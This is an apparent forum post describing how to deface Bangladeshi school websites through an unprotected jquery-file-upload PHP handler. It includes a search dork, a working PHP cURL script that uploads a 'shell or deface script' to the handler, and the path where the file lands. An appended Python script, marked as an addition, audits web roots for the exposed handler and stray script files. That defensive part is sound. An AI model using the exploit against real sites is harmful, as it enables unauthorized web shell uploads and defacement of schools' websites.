11 June 2016
Hello.
This time I want to share how to deface Bangladeshi school sites.
It's like the Balitbang bug, if you're in Indonesia.
The bug is in the jquery-file-upload plugin.
OK, let's get straight to it.
dork: Developed by exdmania
script:
POC:
<?php
$file = "kkk.htm"; // shell or deface script
$post = array("files[]" => "@$file",
);
$ch2 = curl_init ("http://site.com/assets/super_admin/vendor/jquery-file-upload/server/php/");
curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch2, CURLOPT_POST, 1);
curl_setopt ($ch2, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch2);
echo $data."\n\n\n";
?>
result:
/assets/super_admin/vendor/jquery-file-upload/server/php/files/
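
For site owners, a way to check a web root for this bundled upload handler and for non-image files sitting in its `files/` directory, as an added example that is not part of the original post. The function names, the image-only allowlist and the sample tree are assumptions constructed for illustration; `index.php` and `UploadHandler.php` are the handler file names shipped in the plugin's `server/php` directory.

```python
import os
import tempfile

# Assumption: the upload directory is meant to hold images only; adjust per site.
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
SCRIPT_EXT = {"php", "phtml", "php5", "phar", "htm", "html", "js", "svg"}
HANDLER_SUFFIX = os.path.join("jquery-file-upload", "server", "php")


def audit_webroot(webroot):
    """Return one finding per jquery-file-upload server/php directory under webroot."""
    findings = []
    for dirpath, _dirs, filenames in os.walk(webroot):
        if not dirpath.lower().endswith(HANDLER_SUFFIX):
            continue
        upload_dir = os.path.join(dirpath, "files")
        unexpected = []
        for sub, _d, names in os.walk(upload_dir):
            for name in names:
                parts = name.lower().split(".")[1:]
                # Flag a disallowed final extension, or a script extension
                # hidden earlier in the name (photo.php.jpg).
                if not parts or parts[-1] not in ALLOWED_EXT or SCRIPT_EXT & set(parts):
                    unexpected.append(os.path.relpath(os.path.join(sub, name), upload_dir))
        findings.append({
            "handler_dir": os.path.relpath(dirpath, webroot),
            "handler_present": any(f in ("index.php", "UploadHandler.php") for f in filenames),
            "unexpected_files": sorted(unexpected),
        })
    return findings


def build_sample_tree(root):
    """Constructed sample web root mirroring the path layout named in the post."""
    php_dir = os.path.join(root, "assets", "super_admin", "vendor",
                           "jquery-file-upload", "server", "php")
    os.makedirs(os.path.join(php_dir, "files"))
    for rel in ("index.php", "files/logo.png", "files/kkk.htm", "files/photo.php.jpg"):
        open(os.path.join(php_dir, *rel.split("/")), "w").close()


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        for finding in audit_webroot(root):
            print(finding)
```

Any finding with `handler_present` set means the PHP handler is still deployed under the web root; removing it or placing it behind authentication, and serving `files/` with script execution disabled, closes the path described above.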